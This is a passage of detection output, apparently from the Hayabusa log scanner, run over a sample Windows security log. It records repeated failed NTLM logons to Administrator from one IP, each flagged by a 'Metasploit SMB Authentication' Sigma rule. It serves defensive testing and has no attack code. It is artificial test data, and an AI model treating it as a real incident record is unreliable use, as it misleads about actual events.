NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
